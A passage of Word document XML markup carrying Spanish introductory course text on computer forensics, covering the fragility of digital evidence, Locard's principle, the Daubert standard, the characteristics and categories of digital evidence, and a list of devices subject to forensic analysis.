      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La evidencia digital o electrónica es sumamente frágil, de ahí la importancia de mantener su integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida.</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0D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; por ejemplo, el simple hecho de pulsar dos veces en un archivo modificaría la última fecha de acceso </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAAD66" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dentro del proceso del análisis forense, un examinador forense digital puede llegar a recuperar información que haya sido borrada desde el sistema operativo. El informático forense debe tener muy presente el principio de intercambio de Locard por su importancia en el análisis criminalístico, así como el estándar de Daubert para hacer admisibles en juicio las pruebas presentadas por el experto forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074EAC0E" w14:textId="3E262DB4" w:rsidR="00E82E18" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Es muy importante mencionar que la informática o el análisis forense no tiene como objetivo prevenir delitos, por lo que resulta imprescindible tener claros los distintos marcos de actuación de la informática forense, la </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seguridad y la auditoría informáticas</w:t>
      </w:r>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075788EC" w14:textId="00037ACC" w:rsidR="00E82E18" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:t>Objetivos de la informática forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23505D19" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La informática forense tiene tres objetivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B22D20" w14:textId="564612F7" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La compensación de los daños causados por los intrusos o criminales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A04D6" w14:textId="6C3B2B8C" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La persecución y procesamiento judicial de los criminales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771841E8" w14:textId="2A2345E3" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La creación y aplicación de medidas para prevenir casos similares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C3108" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estos objetivos se alcanzan de varias formas, siendo la principal la recopilación de evidencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112B7C6" w14:textId="4816492A" w:rsidR="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Es importante mencionar que quienes se dedican a la informática forense deben ser profesionales con altos niveles de ética, pues gracias a su trabajo se toman decisiones sobre los hechos y casos analizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076AC323" w14:textId="77777777" w:rsidR="00F21A91" w:rsidRDefault="00F21A91" w:rsidP="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E62F68C" w14:textId="77777777" w:rsidR="00F21A91" w:rsidRDefault="00F21A91" w:rsidP="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49575261" w14:textId="25CCD70E" w:rsidR="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:lastRenderedPageBreak/>
        <w:t>Evidencia digital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AB8A0" w14:textId="61508C95" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Los discos duros, las memorias </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USB</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USB (Universal Serial Bus): Estándar de industria para cables, conectores y protocolos de comunicación para la conexión, comunicación y suministro de energía entre computadoras y dispositivos electrónicos."</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y las impresoras (entre otros elementos) se pueden considerar evidencias en un proceso legal, al igual que las huellas digitales o las armas. Las evidencias digitales son las que se extraen de un medio informático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB635E3" w14:textId="3AE921DA" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="00D54AC2" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Características.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C7B52" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estas evidencias comparten una serie de características que dificultan el ejercicio de la computación forense:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF3309" w14:textId="090F9FAE" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Volatilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2785C846" w14:textId="4DD2A64E" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Anonimato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260DD66" w14:textId="347E5AAC" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Facilidad de duplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A8631" w14:textId="2B90E7D5" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alterabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AF478" w14:textId="45C09370" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Facilidad de eliminación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D363F" w14:textId="53B85366" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="00D54AC2" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Categorías.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E9C02B" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estas evidencias se pueden dividir en tres categorías:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64CA34" w14:textId="7C92499B" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Registros almacenados en el equipo de tecnología informática (ej. imágenes y correos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADEA7B" w14:textId="5798559D" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Registros generados por equipos de tecnología informática (ej. transacciones, registros en eventos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609565C" w14:textId="755BD96B" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Registros parcialmente generados y almacenados en los equipos de tecnología informática (ej. consultas en bases de datos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169738AF" w14:textId="07E37238" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="00D54AC2" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dispositivos que analizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69374C99" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB" w:rsidP="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cualquier infraestructura informática que tenga una memoria (almacenamiento) es susceptible a los análisis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B0AA4" w14:textId="46E202CA" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disco duro de una Computadora o Servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E741E68" w14:textId="73852FDE" w:rsidR="000D10AB" w:rsidRPr="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Documentación referente al caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF33C0" w14:textId="4634BB80" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D10AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipo de </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sistema de telecomunicaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3140E4" w14:textId="32796626" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dirección MAC</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MAC: Media Access Control, dirección única asignada a la interfaz de red de un dispositivo."</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55933322" w14:textId="1388B0A5" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inicios de sesiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1D840F" w14:textId="38D6659B" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Información de los cortafuegos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065FEBB9" w14:textId="30FCBB30" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</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IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red."</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 redes Proxy</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Proxy: Servidor que actúa como intermediario para solicitudes de recursos de clientes a otros servidores."</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 LMhost</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LMhost: Archivo en sistemas Windows utilizado para mapear nombres de red a direcciones IP."</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 host, conexiones cruzadas, pasarelas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2DB7F" w14:textId="138602E6" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Software de supervisión y seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B4EF6" w14:textId="0E31E3CD" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Credenciales de autentificación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0F335" w14:textId="28AC37E9" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rastreo de paquetes de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF08CE" w14:textId="22F11162" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Teléfonos móviles o celulares (telefonía móvil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61846D" w14:textId="220A92A7" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Agendas electrónicas (PDA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51222F46" w14:textId="3FE5D7B6" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dispositivos de GPS</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GPS (Global Positioning System): Sistema de navegación por satélite que proporciona información de ubicación y tiempo en todo el mundo."</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C7D01" w14:textId="7F023092" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impresoras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD44A68" w14:textId="2C545B30" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Memorias USB</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USB (Universal Serial Bus): Estándar de industria para cables, conectores y protocolos de comunicación para la conexión, comunicación y suministro de energía entre computadoras y dispositivos electrónicos."</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DA257E" w14:textId="03C04EBE" w:rsidR="000D10AB" w:rsidRPr="009440E4" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
